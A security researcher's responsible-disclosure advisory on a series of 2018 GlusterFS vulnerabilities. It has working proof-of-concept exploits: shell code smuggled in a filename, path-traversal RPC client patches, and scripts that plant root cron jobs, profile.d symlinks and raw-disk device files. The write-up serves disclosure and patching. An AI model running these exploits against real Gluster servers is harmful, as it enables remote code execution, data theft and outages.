Author: Michael Hanselmann. Updated: September 11, 2018.
During July and early August 2018 I reported a series of vulnerabilities in Gluster file system to Red Hat using responsible disclosure. Patch releases were made available on September 4, 2018:
- Red Hat Gluster Storage 3.4 on Red Hat Enterprise Linux 7 (RHSA-2018:2607)
- Red Hat Gluster Storage 3.4 on Red Hat Enterprise Linux 6 (RHSA-2018:2608)
The upstream project made patch releases on September 6, 2018.
Contents
- Unsanitized file names in debug/io-stats translator can allow remote attackers to execute arbitrary code (CVE-2018-10904)
- Reproduction
- Stack-based buffer overflow in server-rpc-fops.c allows remote attackers to execute arbitrary code (CVE-2018-10907)
- Reproduction
- I/O to arbitrary devices on storage server (CVE-2018-10923)
- Reproduction
- Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory (CVE-2018-10911)
- Reproduction
- Remote denial of service of gluster volumes via posix_get_file_contents function in posix-helpers.c (CVE-2018-10914)
- Information exposure in posix_get_file_contents function in posix-helpers.c (CVE-2018-10913)
- Reproduction
- Denial-of-service via fsync(2) in Gluster FUSE client (CVE-2018-10924)
- Reproduction
- RPC path traversal
- Reproduction preparation
- File status information leak and denial of service (CVE-2018-10927)
- Reproduction
- Improper resolution of symlinks allows for privilege escalation (CVE-2018-10928)
- Reproduction
- Arbitrary file creation on storage server allows for execution of arbitrary code (CVE-2018-10929)
- Reproduction
- Files can be renamed outside volume (CVE-2018-10930)
- Reproduction
- Device files can be created in arbitrary locations (CVE-2018-10926)
- Reproduction
Unsanitized file names in debug/io-stats translator can allow remote attackers to execute arbitrary code (CVE-2018-10904)
The Gluster file system automatically inserts the debug/io-stats translator into the translator graphs of all volumes. Setting an extended attribute (xattr) with a particular name on any element of a volume causes its string value to be treated as a path, on both client and server, to which I/O statistics are written. The path can be anything, including locations such as /etc. This behaviour can be used to gain remote code execution. An attacker merely requires sufficient access to modify the extended attributes of files on a Gluster volume.
Reproduction
Reproduced using Gluster 3.12.8 running on RHEL 7.5, discovered in Gluster 3.12.12 code.
Assume we have a Gluster volume named “gluster-pv15” on a storage server we don't control. The volume is mounted on the client at /data. First, a file must be opened whose name contains the shell code to be executed:
```shell
while sleep 1; do date; done \
  >$'/data/a\necho; echo "Hello World, I am $(id)"; echo\n'
```
The first proof-of-concept code for this vulnerability used the xattr trusted.io-stats-dump
. The Linux kernel only allows users with the CAP_SYS_ADMIN capability to manipulate xattrs in the trusted
namespace. Assuming the attacker has no direct access to the storage servers, but has full control over the client with the volume mounted via Gluster's FUSE client, that is no hindrance.
What I only realized after re-reading the code is that the Gluster code doesn't actually check for the trusted
namespace and uses fnmatch(3)
instead. Thus it's also possible to exploit this vulnerability as an unprivileged user.
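The consequence of matching with fnmatch(3) can be sketched in a few lines; the wildcard pattern below is an assumption chosen for illustration, not the literal pattern from the io-stats code:

```python
import fnmatch

# Hypothetical wildcard pattern in the style of the io-stats check;
# the real pattern is not reproduced here.
PATTERN = "*io-stats-dump"

def triggers_dump(xattr_name):
    """Return True if the xattr name matches the wildcard-based check."""
    return fnmatch.fnmatch(xattr_name, PATTERN)

# A pure wildcard match cannot tell the privileged 'trusted.' namespace
# apart from the unprivileged 'user.' namespace:
print(triggers_dump("trusted.io-stats-dump"))  # True
print(triggers_dump("user.io-stats-dump"))     # True
print(triggers_dump("user.mime_type"))         # False
```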
Set the user.io-stats-dump
xattr in a second shell:
setfattr -n user.io-stats-dump -v /etc/bash_completion.d/poc /data
What will have happened is that /etc/bash_completion.d/poc.gluster-pv15
was written on the client and /etc/bash_completion.d/poc.gluster-pv15-io-stats
on the server. The next time anyone starts an interactive Bash shell on a Gluster server the file contents are sourced and executed. On my test environment the following message is shown multiple times upon opening a shell:
Hello World, I am uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
The trivial example produces many errors upon sourcing, though a real-world exploit could use ANSI/VT100 codes to clear the responsible lines and move the cursor back to its original location before moving itself to a more appropriate and persistent location where no visible errors will be produced.
What prevents the code from directly writing a cron file in /etc/cron.d
is that the dump file uses an insecure mode of 0666 on the server, presumably due to umask, which cron complains about (“BAD FILE MODE (/etc/cron.d/poc.gluster-pv15-io-stats)”; clients use 0644). This could well be considered a further security issue.
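The reason cron rejects the dump file can be expressed as a one-line permission check; this is a simplified sketch of cron's test for group- or world-writable crontab files, not its actual source:

```python
import stat

def cron_would_reject(mode):
    # cron refuses crontab files in /etc/cron.d that are writable by
    # group or others.
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

print(cron_would_reject(0o666))  # True  -> "BAD FILE MODE"
print(cron_would_reject(0o644))  # False -> accepted
```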
Stack-based buffer overflow in server-rpc-fops.c allows remote attackers to execute arbitrary code (CVE-2018-10907)
The GlusterFS server is vulnerable to multiple stack-based buffer overflows due to functions in server-rpc-fops.c allocating fixed-size buffers using alloca(3). An authenticated attacker could exploit this by mounting a Gluster volume and sending a string longer than the fixed buffer size, causing a crash or potentially code execution.
Reproduction
Reproduced using Gluster 3.12.12.
```python
from gluster import gfapi

vol = gfapi.Volume('localhost', 'vol1', port=24007, log_file='/dev/stderr')
vol.mount()
print(vol.getxattr("test", 2000 * "A"))
```
Excerpt from stack trace in glusterfsd
:
```
#0  __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1  0x00007fffea494245 in gf_strdup (
    src=0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>)
    at ../../../../libglusterfs/src/mem-pool.h:185
```
I/O to arbitrary devices on storage server (CVE-2018-10923)
The Gluster file system implements a series of file system operations in the form of remote procedure calls (RPC). They are transported over the wire using TCP, optionally protected by SSL/TLS.
The mknod
call, derived from mknod(2)
, can be used by an authenticated attacker to create files pointing to devices (“device special file”). Such device files can be opened on the server using normal I/O operations. As a consequence it's possible to read arbitrary devices. Writing is likely also possible, but wasn't tested.
Reproduction
Reproduced with Gluster 3.12.12 on release-3.12 branch (commit f98d86f2a) with minor local changes in client code (see patch).
The provided reproduction code written in Python reads the first 512 bytes of /dev/sda
. Those bytes usually contain the master boot record (MBR) ending in the boot signature 0x55AA.
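A quick way to sanity-check the returned sector is to look for that signature in the final two bytes; a minimal sketch (the sample bytes are fabricated):

```python
def looks_like_mbr(sector):
    """Heuristic: a classic MBR is 512 bytes ending in 0x55 0xAA."""
    return len(sector) == 512 and sector[-2:] == b"\x55\xaa"

# Fabricated example sector for illustration only:
fake = bytes(510) + b"\x55\xaa"
print(looks_like_mbr(fake))        # True
print(looks_like_mbr(bytes(512)))  # False
```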
Patching the Gluster client code is necessary to disable a file type check in the API client as well as the “open-behind” translator as the latter seems to break opening devices. Passing O_TRUNC via the flags to the open
function would have the same effect in most cases (see open-behind.c:ob_open_behind
), but was considered too dangerous for general-purpose reproduction code. Another option would be to ignore the open-behind
translator when building the I/O graph.
Assume we have a Gluster volume named “vol2” on a storage server we don't control, but whose API we can access (i.e. the FUSE client isn't involved). Create it for test purposes:
```shell
lvcreate --name vol2 --size 100M vg
mkfs.ext4 /dev/vg/vol2
mkdir /data/vol2
mount /dev/vg/vol2 /data/vol2
gluster volume create vol2 storage1:/data/vol2/brick force
gluster volume start vol2
```
Build and install Gluster client library with patch applied (exact instructions depend on environment):
```shell
patch -p1 <<'EOF'
diff --git a/api/src/glfs-fops.c b/api/src/glfs-fops.c
index 7fb86fc85..5492bb683 100644
--- a/api/src/glfs-fops.c
+++ b/api/src/glfs-fops.c
@@ -194,12 +194,6 @@ retry:
         goto out;
     }
 
-    if (!IA_ISREG (iatt.ia_type)) {
-        ret = -1;
-        errno = EINVAL;
-        goto out;
-    }
-
     if (glfd->fd) {
         /* Retry. Safe to touch glfd->fd as we still
            have not glfs_fd_bind() yet.
diff --git a/xlators/performance/open-behind/src/open-behind.c b/xlators/performance/open-behind/src/open-behind.c
index d6dcf6fbc..d266dc3e8 100644
--- a/xlators/performance/open-behind/src/open-behind.c
+++ b/xlators/performance/open-behind/src/open-behind.c
@@ -259,7 +259,7 @@ ob_open_behind (call_frame_t *frame, xlator_t *this, loc_t *loc, int flags,
 
     conf = this->private;
 
-    if (flags & O_TRUNC) {
+    if (1) {
         STACK_WIND (frame, default_open_cbk, FIRST_CHILD (this),
                     FIRST_CHILD (this)->fops->open,
                     loc, flags, fd, xdata);
EOF
make && sudo make install
```
Install the libgfapi Python module with mknod(2) support on the client as an unprivileged user:
```shell
git clone https://github.com/gluster/libgfapi-python.git
cd libgfapi-python
python setup.py build
python setup.py install --user
```
Run the following Python 2.x code on the client as an unprivileged user with the libgfapi module installed. Assuming the storage server has an “sda” disk, the printed data should end with 0x55AA.
```
$ python <<'EOF'
import os, stat
from gluster import gfapi

vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr")
vol.mount()
vol.setfsuid(0)
vol.setfsgid(0)

if vol.exists("device"):
    vol.unlink("device")

# sda is major=8, minor=0
vol.mknod("device", stat.S_IFBLK | 0600, os.makedev(8, 0))

with gfapi.File(vol.open("device", os.O_RDONLY)) as fh:
    print fh.read(512).encode("hex")
EOF
```
Example output (logging disabled):
```
$ python gfvol.py
eb63[…]000000000000000000000000000055aa
```
Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory (CVE-2018-10911)
The dict.c:dict_unserialize
function in GlusterFS does not handle negative key length values properly. An attacker could use this flaw to read memory from other locations into the stored dict value.
Reproduction
```c
dict_t *dict = dict_new();
if (!dict) {
        return 0;
}

char test[] = "qwertzuip";
char friends_val[] = {
        // Count
        0x00, 0x00, 0x00, 0x01,
        // Negative key len
        0xff, 0xff, 0xff, 0xff - 22,
        // Value len
        0x00, 0x00, 0x00, 10,
        // Key
        'K', 'E', 'Y', '\0',
        // Value
        '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '\0',
        // End
        0x00,
};

ret = dict_unserialize(friends_val, sizeof(friends_val), &dict);
printf("ret = %d\n", ret);
printf("%s\n", test);
dict_dump_to_log(dict);
```
In my tests the output was as follows:
```
ret = 0
qwertzuip
[…] [dict.c:3052:dict_dump_to_log] […] ((KEY:qwertzuip))
```
Note how the value is not 0123456789
as one would expect. Instead an unrelated string from another variable is used.
If one finds an RPC function reflecting an incoming dictionary it might be possible to read a function pointer and extract the libc base address. If the serialized dictionary is stored in a stack-allocated buffer (alloca(3)
) it might be possible to get the stack canary. And even on the heap it might be possible to get values better not shared with remote parties.
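The root cause is easiest to see by decoding the header fields of the crafted buffer above as signed big-endian 32-bit integers; a short sketch mirroring the test buffer's layout (not dict.c itself):

```python
import struct

# Header of the crafted buffer from the test above: pair count, then a
# 4-byte key length and a 4-byte value length, all big-endian.
buf = bytes([0x00, 0x00, 0x00, 0x01,        # count = 1
             0xff, 0xff, 0xff, 0xff - 22,   # key length field
             0x00, 0x00, 0x00, 10])         # value length = 10

count, keylen, vallen = struct.unpack(">iii", buf)
print(count, keylen, vallen)  # -> 1 -23 10

# Read as a signed 32-bit integer, the key length is negative, so
# length-based pointer arithmetic walks into unrelated memory.
```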
Remote denial of service of gluster volumes via posix_get_file_contents function in posix-helpers.c (CVE-2018-10914)
Unprivileged users can issue an xattr request via Gluster FUSE to cause brick processes to terminate with a segmentation fault. If Gluster multiplexing is enabled this will result in a crash of multiple bricks and Gluster volumes.
See CVE-2018-10913 for reproduction.
Information exposure in posix_get_file_contents function in posix-helpers.c (CVE-2018-10913)
Unprivileged users can use xattr requests via Gluster FUSE to determine the existence of any file on a server.
Reproduction
Tested with Gluster 3.12.12 from release-3.12 Git branch as of about July 14, 2018.
It appears that in 2012 there was an attempt to implement a “read file” extended attribute in Gluster (glusterfs.file.<filename>
, checked for in posix.c:posix_getxattr
and calling into posix-helpers.c:posix_get_file_contents
) and the code was never finished, or has since been made into a virtual no-op. The resulting file content is neither used nor returned. However, after reading the file content there is a bug due to operator precedence ([] binds before the pointer dereference) whereby the file size acts as an offset, in pointer-sized increments, from a heap-allocated buffer at which a zero byte is written. If the file existed and no page is mapped at the offset address, the brick process receives SIGSEGV and terminates:
```
Thread 10 "glusteriotwr0" received signal SIGSEGV, Segmentation fault.
0x00007f8a9d1ffdc3 in posix_get_file_contents (this=0x7f8a9800ae50, pargfid=0x7f8a6c002760 "",
    name=0x7f8a6c00623f "../../../../../../../../../../../../etc/shadow",
    contents=0x7f8aa335c3c0) at posix-helpers.c:1055
1055            *contents[stbuf.ia_size] = '\0';
```
Otherwise a file anywhere within the Gluster volume or outside (see below) can be controlled by an attacker to set the offset for the write. Fixing that bug is not enough:
```diff
--- a/xlators/storage/posix/src/posix-helpers.c
+++ b/xlators/storage/posix/src/posix-helpers.c
@@ -1052,7 +1052,7 @@ posix_get_file_contents (xlator_t *this, uuid_t pargfid,
                 goto out;
         }
 
-        *contents[stbuf.ia_size] = '\0';
+        (*contents)[stbuf.ia_size] = '\0';
 
         op_ret = sys_close (file_fd);
         file_fd = -1;
```
Now the function allows an arbitrary user to reliably determine whether a file exists via the error code (EOPNOTSUPP means file exists, ENOENT means file does not exist). The path can be anything, including outside the Gluster file system (note that this is with the fix applied and with the brick running on the same system):
```
$ rm -f /tmp/file; sudo -u nobody getfattr -n glusterfs.file.../../../../../../../../../../../../../tmp/file /mnt/
/mnt/: glusterfs.file.../../../../../../../../../../../../../tmp/file: No such file or directory

$ touch /tmp/file2; sudo -u nobody getfattr -n glusterfs.file.../../../../../../../../../../../../../tmp/file2 /mnt/
/mnt/: glusterfs.file.../../../../../../../../../../../../../tmp/file2: Operation not permitted
```
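A client-side probe can turn this errno behaviour into a simple existence oracle. The following is a sketch assuming a FUSE mount point and Python 3's os.getxattr; the traversal depth is chosen arbitrarily:

```python
import errno
import os

def xattr_name(target):
    # Build the traversal xattr name used in the getfattr calls above.
    return "glusterfs.file." + "../" * 12 + target.lstrip("/")

def classify(errno_value):
    # EOPNOTSUPP means the file exists, ENOENT that it does not.
    if errno_value == errno.EOPNOTSUPP:
        return "exists"
    if errno_value == errno.ENOENT:
        return "missing"
    return "unknown"

def probe(mountpoint, target):
    """Probe for 'target' on the server via the glusterfs.file xattr."""
    try:
        os.getxattr(mountpoint, xattr_name(target))
    except OSError as err:
        return classify(err.errno)
    return "unknown"

# Usage (hypothetical mount point): probe("/mnt", "/etc/shadow")
```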
There is also a “write file” counterpart xattr (posix-helpers.c:posix_set_file_contents
called from posix-helpers.c:posix_handle_pair
). Luckily this one is disabled with a hardcoded return -1
.
Denial-of-service via fsync(2) in Gluster FUSE client (CVE-2018-10924)
The Gluster FUSE client exposes a POSIX-like file system by using Gluster volume servers as a storage backend. One operation available on file descriptors is fsync(2)
which “[…] transfers ("flushes") all modified in-core data of […] the file referred to by the file descriptor fd to the disk device […]”.
In at least Gluster 3.12.11 and 3.12.12 fsync(2)
leaks memory. An authenticated attacker could use this flaw to launch a denial-of-service attack by making Gluster clients consume memory on the host machine. State dumps show large and continuously growing allocation counts for gf_common_mt_memdup and gf_common_mt_char.
After about 20 minutes of running two instances of the reproduction code the FUSE client consumes around 1.9 GB of RAM. Eventually the kernel's out-of-memory (OOM) killer will take out other, unrelated processes.
Reproduction
Reproduced with Gluster 3.12.12 installed from CentOS build server into a CentOS 7 Docker container. Also reproduced with Gluster 3.12.11 from CentOS Storage SIG repository installed on RHEL 7.5 servers.
Start a privileged container to contain the installed packages:
docker run --privileged --rm -it --name centos docker.io/library/centos:7
Configure repository:
```shell
cat > /etc/yum.repos.d/gluster.repo <<'EOF'
[gluster]
name=gluster
baseurl=https://buildlogs.centos.org/centos/7/storage/x86_64/gluster-3.12/
enabled=True
gpgcheck=True
gpgkey=https://raw.githubusercontent.com/CentOS-Storage-SIG/centos-release-storage-common/master/RPM-GPG-KEY-CentOS-SIG-Storage
priority=1
exclude=
EOF
```
Install Gluster FUSE client (at the time of writing the 3.12.12 packages aren't signed on the build server and aren't available via mirrors):
```shell
yum makecache && \
    yum install -y --nogpgcheck glusterfs-fuse
```
Verify installed version:
```
$ glusterfs --version
glusterfs 3.12.12
```
Mount a test volume:
mount -t glusterfs storage1:/gluster-pv12 /mnt
Run reproduction code, optionally in multiple instances (start more shells with docker exec -it centos /bin/bash
):
```
python <<'EOF'
import os, time

with open("/mnt/tmp{}".format(os.getpid()), "w") as fh:
    while True:
        os.lseek(fh.fileno(), 0, os.SEEK_SET)
        os.write(fh.fileno(), str(time.time()).encode("ascii"))
        os.fsync(fh)
EOF
```
Let the reproduction run for a short while, then start observing top or similar. One will notice the ever-increasing memory consumption of the "glusterfs" process backing the volume mount.
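The growth can also be tracked programmatically by sampling VmRSS from /proc; a small sketch (process ID and sampling interval are up to the operator):

```python
import time

def parse_vmrss(status_text):
    """Extract VmRSS in KiB from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("VmRSS:"):
            return int(line.split()[1])
    return None

def rss_kib(pid):
    with open("/proc/{}/status".format(pid)) as fh:
        return parse_vmrss(fh.read())

def watch(pid, interval=10):
    # Print a timestamped RSS sample every few seconds.
    while True:
        print("{}: VmRSS = {} KiB".format(time.ctime(), rss_kib(pid)))
        time.sleep(interval)

# Usage: watch(<pid of the "glusterfs" process backing the mount>)
```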
RPC path traversal
Reproduction preparation
These vulnerabilities were reproduced with Gluster 3.12.12 on release-3.12 branch (commit f98d86f2a) with minor local changes (see patch).
A small set of the RPC request data structures allow clients to specify a path or filename. The Gluster server does not validate these sufficiently. Depending on the request type they allow a malicious client to escalate privileges and execute code on the server by performing a path traversal attack, to cause the brick process to terminate (denial of service, esp. on clusters where brick multiplexing is enabled), or to extract information on files and directories.
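Conceptually the missing server-side check is small: every basename arriving over RPC should be a single path component. The sketch below illustrates such a check; it is not the actual upstream fix:

```python
import os

def is_safe_basename(bname):
    """Accept only a single path component: no separators, no '.'/'..'."""
    return (bool(bname)
            and "/" not in bname
            and bname not in (".", ".."))

def resolve_in_brick(brick_root, bname):
    # Reject traversal attempts before touching the filesystem.
    if not is_safe_basename(bname):
        raise ValueError("rejected basename: {!r}".format(bname))
    return os.path.join(brick_root, bname)

print(resolve_in_brick("/data/vol2/brick", "file.txt"))
# -> /data/vol2/brick/file.txt
# resolve_in_brick("/data/vol2/brick", "../../../../etc/cron.d/poc")
# -> raises ValueError
```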
The reproduction uses a patched version of the Gluster client API code and Python code to trigger the vulnerabilities. Doing so is simpler than producing a standalone client.
Assume we have a Gluster volume named “vol2” on a storage server we don't control, but whose API we can access (i.e. the FUSE client isn't involved). Create it for test purposes:
```shell
lvcreate --name vol2 --size 100M vg
mkfs.ext4 /dev/vg/vol2
mkdir /data/vol2
mount /dev/vg/vol2 /data/vol2
gluster volume create vol2 storage1:/data/vol2/brick force
gluster volume start vol2
```
Reproduction cases may cause the Gluster brick process to terminate. Restart if necessary:
```shell
gluster --mode=script volume stop vol2 force && \
    gluster --mode=script volume start vol2 force
```
Build and install Gluster client library with patch applied (exact instructions depend on environment):
```shell
patch -p1 <<'EOF'
diff --git a/api/src/glfs-fops.c b/api/src/glfs-fops.c
index 7fb86fc85..5492bb683 100644
--- a/api/src/glfs-fops.c
+++ b/api/src/glfs-fops.c
@@ -194,12 +194,6 @@ retry:
         goto out;
     }
 
-    if (!IA_ISREG (iatt.ia_type)) {
-        ret = -1;
-        errno = EINVAL;
-        goto out;
-    }
-
     if (glfd->fd) {
         /* Retry. Safe to touch glfd->fd as we still
            have not glfs_fd_bind() yet.
diff --git a/xlators/protocol/client/src/client-common.c b/xlators/protocol/client/src/client-common.c
index 873b0f0f4..5755bb421 100644
--- a/xlators/protocol/client/src/client-common.c
+++ b/xlators/protocol/client/src/client-common.c
@@ -89,6 +89,16 @@ client_pre_mknod (xlator_t *this, gfs3_mknod_req *req, loc_t *loc,
         req->dev = rdev;
         req->umask = umask;
 
+        if (req->bname && strncmp(req->bname, "poc-mknod-", 10) == 0) {
+                size_t len = 100 + strlen(req->bname);
+                char *newbname = calloc(len, 1);
+                if (!newbname) {
+                        op_errno = ENOMEM;
+                        goto out;
+                }
+                snprintf(newbname, len, "../../../../../../../../tmp/%s", req->bname);
+                req->bname = newbname;
+        }
+
         GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val),
                                     req->xdata.xdata_len, op_errno, out);
@@ -205,6 +215,10 @@ client_pre_symlink (xlator_t *this, gfs3_symlink_req *req, loc_t *loc,
         req->bname = (char *)loc->name;
         req->umask = umask;
 
+        if (req->bname && strcmp(req->bname, "poc-symlink") == 0) {
+                req->bname = strdup("../../../../../../etc/profile.d/poc-symlink.sh");
+        }
+
         GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val),
                                     req->xdata.xdata_len, op_errno, out);
         return 0;
@@ -241,6 +255,10 @@ client_pre_rename (xlator_t *this, gfs3_rename_req *req, loc_t *oldloc,
         req->oldbname = (char *)oldloc->name;
         req->newbname = (char *)newloc->name;
 
+        if (oldloc->name && strcmp(oldloc->name, "poc-rename-source") == 0) {
+                req->newbname = (char *)"../../../../../../../../poc-rename-dest";
+        }
+
         GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val),
                                     req->xdata.xdata_len, op_errno, out);
@@ -664,6 +682,10 @@ client_pre_create (xlator_t *this, gfs3_create_req *req,
         req->flags = gf_flags_from_flags (flags);
         req->umask = umask;
 
+        if (loc->name && strcmp(loc->name, "poc-creat-cron.d") == 0) {
+                req->bname = (char *)"../../../../../../../../etc/cron.d/poc-creat";
+        }
+
         GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val),
                                     req->xdata.xdata_len, op_errno, out);
@@ -787,6 +809,21 @@ client_pre_lookup (xlator_t *this, gfs3_lookup_req *req, loc_t *loc,
         else
                 req->bname = "";
 
+        if (loc->name && strncmp(loc->name, "poc-lookup-", 11) == 0) {
+                memset(req->gfid, '\0', 16);
+                memset(req->pargfid, '\0', 16);
+                req->pargfid[15] = 1;
+
+                if (strcmp(loc->name, "poc-lookup-bin-ls") == 0) {
+                        req->bname = (char *)"../../../../../../../../bin/ls";
+                } else if (strcmp(loc->name, "poc-lookup-assert") == 0) {
+                        req->bname = (char *)"../../../../../../../../tmp/";
+                } else {
+                        op_errno = EINVAL;
+                        goto out;
+                }
+        }
+
         if (xdata) {
                 GF_PROTOCOL_DICT_SERIALIZE (this, xdata, (&req->xdata.xdata_val),
EOF
make && sudo make install
```
Install the libgfapi Python module with mknod(2) support on the client as an unprivileged user:
```shell
git clone https://github.com/gluster/libgfapi-python.git
cd libgfapi-python
python setup.py build
python setup.py install --user
```
File status information leak and denial of service (CVE-2018-10927)
The gfs3_lookup_req
RPC request suffers from a path traversal vulnerability, causing it to leak information to an authenticated attacker. Given the right circumstances it can also be used to crash a Gluster brick process.
Reproduction
(See separate preparation steps)
Extract file status information from an arbitrary file or directory. Compare with stat /bin/ls on the storage server. Non-existent files return ENOENT.
```
$ python <<'EOF'
from gluster import gfapi

vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr")
vol.mount()

st = vol.stat("poc-lookup-bin-ls")
print("\n### mode={:o} size={}\n".format(st.st_mode, st.st_size))
EOF
```
Ending the path with a slash (“/”) triggers the “Malformed link” assertion in posix-handle.c:posix_handle_soft, causing the brick process to terminate.
```
$ python <<'EOF'
from gluster import gfapi

vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr")
vol.mount()
vol.stat("poc-lookup-assert")
EOF
```
Excerpt from stack trace:
```
#3  0x00007f7d31ff6fc2 in __GI___assert_fail (assertion=0x7f7d2ce878ca "!\"Malformed link\"",
    file=0x7f7d2ce8755b "posix-handle.c", line=820,
    function=0x7f7d2ce87b10 <__PRETTY_FUNCTION__.16367> "posix_handle_soft") at assert.c:101
#4  0x00007f7d2ce7ea4d in posix_handle_soft (this=0x7f7d2800ae50,
    real_path=0x7f7d32fd8600 "/data/vol1/brick/../../../../../../tmp/", loc=0x7f7cfc002740,
    gfid=0x7f7d32fd84a0 "\212+\027\a\270\303G1\250\233n\332^\005\306\311\351g\350,}\177",
    oldbuf=0x7f7d32fd8410) at posix-handle.c:820
#5  0x00007f7d2ce7793f in posix_gfid_set (this=0x7f7d2800ae50,
    path=0x7f7d32fd8600 "/data/vol1/brick/../../../../../../tmp/", loc=0x7f7cfc002740,
    xattr_req=0x7f7cfc0024d0) at posix-helpers.c:910
#6  0x00007f7d2ce79295 in posix_gfid_heal (this=0x7f7d2800ae50,
    path=0x7f7d32fd8600 "/data/vol1/brick/../../../../../../tmp/", loc=0x7f7cfc002740,
    xattr_req=0x7f7cfc0024d0) at posix-helpers.c:1568
#7  0x00007f7d2ce477d9 in posix_lookup (frame=0x7f7d18000ee0, this=0x7f7d2800ae50,
    loc=0x7f7cfc002740, xdata=0x7f7cfc0024d0) at posix.c:266
```
Improper resolution of symlinks allows for privilege escalation (CVE-2018-10928)
The RPC request gfs3_symlink_req
in GlusterFS allows symlink destinations to point to file paths outside of the Gluster volume. An authenticated attacker could use this flaw to create arbitrary symlinks pointing anywhere on the server and execute arbitrary code on GlusterFS server.
Reproduction
(See separate preparation steps)
Symlinks can be created anywhere via a crafted request. The link destination can, correctly, point anywhere; it doesn't need to resolve on the volume. After running the example code a new script will have been linked in /etc/profile.d/, allowing an attacker to execute code whenever a login shell is opened.
```
$ python <<'EOF'
import os, re, time
from gluster import gfapi

vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr")
vol.mount()
vol.setfsuid(0)
vol.setfsgid(0)

scriptname = "script"

with gfapi.File(vol.open(scriptname, os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o755)) as fh:
    fh.fchmod(0o755)
    fh.write("#!/bin/sh\necho 'Gluster rename PoC {}'\nid\n".format(time.ctime()))

# Get absolute path to script in volume
pinfo = vol.getxattr(scriptname, "glusterfs.pathinfo")
m = re.search(r"(?i)<POSIX\([^)]*\):[^:]*:(?P<path>[^>]+)>", pinfo)
assert m
scriptpath = m.group("path")
assert os.path.isabs(scriptpath)
print "Script path:", scriptpath

vol.symlink(scriptpath, "poc-symlink")
EOF
```
Arbitrary file creation on storage server allows for execution of arbitrary code (CVE-2018-10929)
The gfs3_create_req
RPC request contains a flaw whereby arbitrary files can be created outside a Gluster volume, leading to code execution.
Reproduction
(See separate preparation steps)
Create any file on the storage server, allowing arbitrary code execution. Run the reproduction code and then watch the system log on the storage server for a minute or two. The proof-of-concept code assumes that /etc is on a different filesystem than the volume; otherwise cron complains about the created file having multiple links.
```
$ python <<'EOF'
import os
from gluster import gfapi

vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr")
vol.mount()

# Arbitrary file owner and group
vol.setfsuid(0)
vol.setfsgid(0)

with gfapi.File(vol.open("poc-creat-cron.d", os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o644)) as fh:
    fh.write("* * * * * root echo \"Hello World, `id`\" | logger\n")
EOF
```
Files can be renamed outside volume (CVE-2018-10930)
A flaw in the gfs3_rename_req
RPC request in GlusterFS server allows an authenticated attacker to write files outside the Gluster volume.
Reproduction
(See separate preparation steps)
The source name is resolved within the volume and must exist, but the destination may be outside. This works only when the destination is on the same filesystem as the source, and fails with EXDEV otherwise. The proof-of-concept exploit assumes that the volume uses the root filesystem (/). Upon completion /poc-rename-dest will exist and contain an up-to-date timestamp.
```
$ python <<'EOF'
import os, time
from gluster import gfapi

vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr")
vol.mount()
vol.setfsuid(0)
vol.setfsgid(0)

src = "poc-rename-source"

# Write source
with gfapi.File(vol.open(src, os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o644)) as fh:
    fh.write("rename poc {}\n".format(time.ctime()))

vol.rename(src, "unused")
EOF
```
Device files can be created in arbitrary locations (CVE-2018-10926)
The RPC request gfs3_mknod_req
supported by the GlusterFS server could be used by an authenticated attacker to create device files at arbitrary locations via path traversal.
Reproduction
(See separate preparation steps)
Device files can be created at any location without trouble. In this example an unprivileged user creates them in /tmp. If they have shell access to the storage server, or other means of reading files, they can then read or write the full disk contents, for example.
```
$ python <<'EOF'
import os, stat
from gluster import gfapi

vol = gfapi.Volume("storage1", "vol2", port=24007, log_file="/dev/stderr")
vol.mount()
vol.setfsuid(0)
vol.setfsgid(0)

vol.mknod("poc-mknod-urandom", stat.S_IFCHR | 0666, os.makedev(1, 9))
vol.mknod("poc-mknod-sda", stat.S_IFBLK | 0666, os.makedev(8, 0))
EOF
```
On storage server:
```
$ sudo -u nobody xxd -l 32 /tmp/poc-mknod-urandom
00000000: 79b5 4f9b d874 e19d afe2 efa1 23fb 122c  y.O..t......#..,
00000010: 64db c1bc a2c9 fee0 fcf6 9c7f da45 e5e6  d............E..

$ sudo -u nobody fdisk -l /tmp/poc-mknod-sda
Disk /tmp/poc-mknod-sda: 24.4 GiB, 26214400000 bytes, 51200000 sectors
[…]
Device              Boot Start      End  Sectors  Size Id Type
/tmp/poc-mknod-sda1 *     2048 51199966 51197919 24.4G 8e Linux LVM
```